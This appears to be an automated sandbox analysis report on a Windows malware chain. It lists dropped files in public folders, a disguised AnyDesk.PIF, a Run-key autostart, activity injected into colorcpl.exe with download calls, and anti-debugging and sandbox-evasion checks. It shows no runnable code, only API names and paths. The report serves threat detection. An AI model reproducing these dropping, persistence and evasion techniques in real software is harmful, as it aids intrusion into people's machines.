                  Source: Binary string: certutil.pdbGCTL source: kn.exe, 00000006.00000002.1681606213.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000006.00000000.1678229839.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000000.1683346312.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000008.00000002.1688987056.00007FF6A2ADE000.00000002.00000001.01000000.00000005.sdmp, kn.exe.4.dr

                  Data Obfuscation

                  barindex
                  Source: Yara matchFile source: 9.2.AnyDesk.PIF.2aa0000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000003.1698319869.000000007FB70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: alpha.exe.2.drStatic PE information: 0xE1CBFC53 [Mon Jan 16 09:26:43 2090 UTC]
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB894C LoadLibraryW,GetProcAddress,FreeLibrary,9_2_02AB894C
                  Source: alpha.exe.2.drStatic PE information: section name: .didat
                  Source: kn.exe.4.drStatic PE information: section name: .didat
                  Source: alpha.pif.14.drStatic PE information: section name: .didat
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A29F3668 push rsp; ret 6_2_00007FF6A29F3669
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ACD2FC push 02ACD367h; ret 9_2_02ACD35F
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AA63AE push 02AA640Bh; ret 9_2_02AA6403
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AA63B0 push 02AA640Bh; ret 9_2_02AA6403
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AA332C push eax; ret 9_2_02AA3368
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ACC378 push 02ACC56Eh; ret 9_2_02ACC566
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AAC349 push 8B02AAC1h; ret 9_2_02AAC34E
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ACD0AC push 02ACD125h; ret 9_2_02ACD11D
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB306B push 02AB30B9h; ret 9_2_02AB30B1
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB306C push 02AB30B9h; ret 9_2_02AB30B1
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ACD1F8 push 02ACD288h; ret 9_2_02ACD280
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ABF108 push ecx; mov dword ptr [esp], edx9_2_02ABF10D
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ACD144 push 02ACD1ECh; ret 9_2_02ACD1E4
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AA6782 push 02AA67C6h; ret 9_2_02AA67BE
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AA6784 push 02AA67C6h; ret 9_2_02AA67BE
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AAD5A0 push 02AAD5CCh; ret 9_2_02AAD5C4
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AAC56C push ecx; mov dword ptr [esp], edx9_2_02AAC571
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ACC570 push 02ACC56Eh; ret 9_2_02ACC566
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ABAAE0 push 02ABAB18h; ret 9_2_02ABAB10
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB8AD8 push 02AB8B10h; ret 9_2_02AB8B08
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ABAADF push 02ABAB18h; ret 9_2_02ABAB10
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AACA1E push 02AACD72h; ret 9_2_02AACD6A
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AACBEC push 02AACD72h; ret 9_2_02AACD6A
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB886C push 02AB88AEh; ret 9_2_02AB88A6
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B14850 push eax; ret 9_2_02B14920
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB790C push 02AB7989h; ret 9_2_02AB7981
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB6948 push 02AB69F3h; ret 9_2_02AB69EB
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB6946 push 02AB69F3h; ret 9_2_02AB69EB
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB5E7C push ecx; mov dword ptr [esp], edx9_2_02AB5E7E
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB2F60 push 02AB2FD6h; ret 9_2_02AB2FCE
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_008671ED push ecx; ret 16_2_00867200

                  Persistence and Installation Behavior

                  barindex
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Puyiaiob.PIFJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00406EEB ShellExecuteW,URLDownloadToFileW,19_2_00406EEB
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\Libraries\Puyiaiob.PIFJump to dropped file
                  Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                  Source: C:\Users\Public\kn.exeFile created: C:\Users\Public\Libraries\AnyDesk.PIFJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file

                  Boot Survival

                  barindex
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\alpha.pifJump to dropped file
                  Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\alpha.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\esentutl.exeFile created: C:\Users\Public\xpha.pifJump to dropped file
                  Source: C:\Windows\System32\extrac32.exeFile created: C:\Users\Public\kn.exeJump to dropped file
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,19_2_0041AADB
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PuyiaiobJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PuyiaiobJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ABAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,9_2_02ABAB1C
                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2A50000 memory commit 500006912
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2A51000 memory commit 500178944
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2A7D000 memory commit 500002816
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2A7E000 memory commit 500350976
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2AD4000 memory commit 501014528
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2BCC000 memory commit 500006912
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2BCE000 memory commit 500015104
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2AA0000 memory commit 500006912Jump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2AA1000 memory commit 500178944Jump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2ACD000 memory commit 500002816Jump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2ACE000 memory commit 500350976Jump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2B24000 memory commit 501014528Jump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2C1C000 memory commit 500006912Jump to behavior
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFMemory allocated: 2C1E000 memory commit 500015104Jump to behavior
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2AC0000 memory commit 500006912
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2AC1000 memory commit 500178944
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2AED000 memory commit 500002816
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2AEE000 memory commit 500350976
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2B44000 memory commit 501014528
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2C3C000 memory commit 500006912
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFMemory allocated: 2C3E000 memory commit 500015104
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040F7E2 Sleep,ExitProcess,19_2_0040F7E2
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F50519 Sleep,ExitProcess,19_2_06F50519
                  Source: C:\Windows\SysWOW64\colorcpl.exeFile opened: \Device\RasAcd count: 159149Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,19_2_0041A7D9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,19_2_06F5B510
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: threadDelayed 9518Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeWindow / User API: foregroundWindowGot 1762Jump to behavior
                  Source: C:\Users\Public\alpha.exeAPI coverage: 8.3 %
                  Source: C:\Users\Public\alpha.exeAPI coverage: 8.6 %
                  Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
                  Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
                  Source: C:\Users\Public\alpha.exeAPI coverage: 9.5 %
                  Source: C:\Users\Public\alpha.pifAPI coverage: 6.2 %
                  Source: C:\Windows\SysWOW64\colorcpl.exeAPI coverage: 5.4 %
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6692Thread sleep time: -46000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6712Thread sleep time: -189000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exe TID: 6712Thread sleep time: -28554000s >= -30000sJump to behavior
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                  Source: C:\Users\Public\xpha.pifLast function: Thread delayed
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,3_2_00007FF7823E2978
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,3_2_00007FF7823E823C
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,3_2_00007FF7823F7B4C
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,3_2_00007FF7823D1560
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,3_2_00007FF7823D35B8
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF7823E2978
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF7823E823C
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF7823F7B4C
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF7823D1560
                  Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF7823D35B8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,6_2_00007FF6A2AA234C
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A3C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,6_2_00007FF6A2A3C6F8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA6F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,6_2_00007FF6A2AA6F80
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA10C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF6A2AA10C4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA3100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,6_2_00007FF6A2AA3100
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,6_2_00007FF6A2A4B3D8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A0D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,6_2_00007FF6A2A0D440
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,6_2_00007FF6A2A4D4A4
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A83674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,6_2_00007FF6A2A83674
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A4DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,6_2_00007FF6A2A4DBC0
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA19F8 #359,FindFirstFileW,FindNextFileW,FindClose,6_2_00007FF6A2AA19F8
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2AA1B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,6_2_00007FF6A2AA1B04
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A45E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,6_2_00007FF6A2A45E58
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AA5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,9_2_02AA5908
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,10_2_00007FF7823E2978
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,10_2_00007FF7823E823C
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,10_2_00007FF7823F7B4C
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,10_2_00007FF7823D1560
                  Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,10_2_00007FF7823D35B8
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,11_2_00007FF7823E2978
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823E823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,11_2_00007FF7823E823C
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823F7B4C FindFirstFileW,FindNextFileW,FindClose,11_2_00007FF7823F7B4C
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D1560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,11_2_00007FF7823D1560
                  Source: C:\Users\Public\alpha.exeCode function: 11_2_00007FF7823D35B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,11_2_00007FF7823D35B8
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00860207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,16_2_00860207
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0086589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,16_2_0086589A
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00864EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,16_2_00864EC1
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_00873E66 FindFirstFileW,FindNextFileW,FindClose,16_2_00873E66
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0085532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,16_2_0085532E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_0040928E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,19_2_0041C322
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,19_2_0040C388
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_004096A0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,19_2_00408847
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00407877 FindFirstFileW,FindNextFileW,19_2_00407877
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_0040BB6B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,19_2_00419B86
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_0040BD72
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F485AE FindFirstFileW,FindNextFileW,19_2_06F485AE
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F4A3D7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_06F4A3D7
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F4CAA9 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_06F4CAA9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F5A8BD FindFirstFileW,19_2_06F5A8BD
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F4C8A2 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_06F4C8A2
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F4957E __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,19_2_06F4957E
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F4D0BF FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,19_2_06F4D0BF
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F5D059 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,19_2_06F5D059
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F49FC5 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_06F49FC5
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,19_2_00407CD2
                  Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF6A2A8511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,6_2_00007FF6A2A8511C
                  Source: Puyiaiob.PIF, 0000001F.00000002.2046639018.000000000075D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
                  Source: AnyDesk.PIF, 00000009.00000002.1845207168.0000000000620000.00000004.00000020.00020000.00000000.sdmp, AnyDesk.PIF, 00000009.00000002.1845207168.0000000000634000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: colorcpl.exe, 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, xpha.pif, 00000017.00000002.1942625529.0000000000940000.00000004.00000020.00020000.00000000.sdmp, Puyiaiob.PIF, 0000001C.00000002.1965697628.00000000006DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\SysWOW64\colorcpl.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess information queried: ProcessInformationJump to behavior

                  Anti Debugging

                  barindex
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02ABF744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,9_2_02ABF744
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFProcess queried: DebugPortJump to behavior
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFProcess queried: DebugPort
                  Source: C:\Users\Public\Libraries\Puyiaiob.PIFProcess queried: DebugPort
                  Source: C:\Users\Public\alpha.exeCode function: 3_2_00007FF7823F63FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,3_2_00007FF7823F63FC
                  Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02AB894C LoadLibraryW,GetProcAddress,FreeLibrary,9_2_02AB894C
                  Source: C:\Users\Public\alpha.pifCode function: 16_2_0087C1FA mov eax, dword ptr fs:[00000030h]16_2_0087C1FA
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_00443355 mov eax, dword ptr fs:[00000030h]19_2_00443355
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 19_2_06F410DD mov eax, dword ptr fs:[00000030h]19_2_06F410DD
